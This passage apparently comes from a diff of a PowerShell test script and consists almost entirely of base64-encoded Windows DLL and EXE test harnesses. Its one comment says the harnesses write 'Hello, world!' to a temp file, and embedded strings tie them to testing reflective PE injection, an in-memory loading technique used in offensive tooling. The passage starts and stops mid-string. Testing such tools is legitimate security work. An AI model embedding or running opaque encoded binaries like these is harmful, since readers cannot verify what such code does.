AwgwAzMzMzMzMzMxVi+yB7BwBAAChHCAAEPMPfgUkIAAQiUX4D7cFICAAEGaJRfygIiAAEFaIRf6hLCAAEIlF8A+3BTAgABBoNCAAEGhAIAAQZg/WRehmiUX0/xUMIAAQUP8VCCAAEIvwhfZ0b2gCAQAAjYXk/v//UI1F+FD/FQAgABCFwHRVaEggABCNheT+//9oAgEAAFD/1oPEDIXAdTtQaIAAAABqAlBqB2gAAABAjYXk/v//UP8VFCAAEIvwhfZ0GGoAagBqDo1F6FBW/xUEIAAQVv8VECAAEF6L5V3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiEAAC4hAAA6IQAATCEAAGAhAAAEIQAAAAAAACVURU1QJQAASGVsbG8sIHdvcmxkIQAAAHN0cmNhdF9zAAAAAG50ZGxsAAAAXHRlc3RvdXRwdXQudHh0AAAAAAAAAAAAAAAAAO58PlYAAAAAkiAAAAEAAAABAAAAAQAAAIggAACMIAAAkCAAABAQAAC0IAAAAABSZWZsZWN0aXZlUEVJbmplY3RUZXN0SGFybmVzcy5kbGwAVm9pZEZ1bmMAAAAA6CAAAAAAAAAAAAAAbiEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIhAAAuIQAAOiEAAEwhAABgIQAABCEAAAAAAACIAENyZWF0ZUZpbGVBABwBRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzQQAlBVdyaXRlRmlsZQBFAkdldFByb2NBZGRyZXNzAAAVAkdldE1vZHVsZUhhbmRsZUEAAFIAQ2xvc2VIYW5kbGUAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAKAAAABowIjAsMDUwPjBIME0wUjBhMGgwhDCNML8w1jDdMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+
+	# A bare bones test harness EXE that simply writes "Hello, world! (EXE ARGS)" to %TEMP%\testoutput.txt
+	$Encoded64BitExe = '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AAAAAEwmAAAAAAAAPCYAAAAAAACsJgAAAAAAAAAAAAAAAAAANiUAAAAAAABAJQAAAAAAAFYlAAAAAAAAaiUAAAAAAAB4JQAAAAAAAC4lAAAAAAAAnCUAAAAAAACoJQAAAAAAALIlAAAAAAAAviUAAAAAAADSJQAAAAAAAAQmAAAAAAAADCYAAAAAAAAWJgAAAAAAACQmAAAAAAAAMiYAAAAAAAAmJQAAAAAAABQlAAAAAAAABCUAAAAAAAD2JAAAAAAAAOgkAAAAAAAAhCUAAAAAAAAAAAAAAAAAAIgAQ3JlYXRlRmlsZUEAIgFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBADQFV3JpdGVGaWxlAEwCR2V0UHJvY0FkZHJlc3MAABsCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAFgBX1hjcHRGaWx0ZXIA8gFfYW1zZ19leGl0AACnAV9fZ2V0bWFpbmFyZ3MAzgFfX3NldF9hcHBfdHlwZQAAGAZleGl0AABYAl9leGl0AAoCX2NleGl0AAAaAl9jb25maWd0aHJlYWRsb2NhbGUA0AFfX3NldHVzZXJtYXRoZXJyAADiAl9pbml0dGVybV9lAOECX2luaXR0ZXJtAFwBX19DX3NwZWNpZmljX2hhbmRsZXIAAKgBX19pbml0ZW52AHgCX2Ztb2RlAAAZAl9jb21tb2RlAAAzAT90ZXJtaW5hdGVAQFlBWFhaAJkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAWwNfbG9jawDHBF91bmxvY2sACQJfY2FsbG9jX2NydACfAV9fZGxsb25leGl0AAIEX29uZXhpdADuAEVuY29kZVBvaW50ZXIAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAywFHZXRDdXJyZW50VGhyZWFkSWQAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAywBEZWNvZGVQb2ludGVyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD+/////////wAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+	$Encoded32BitExe = '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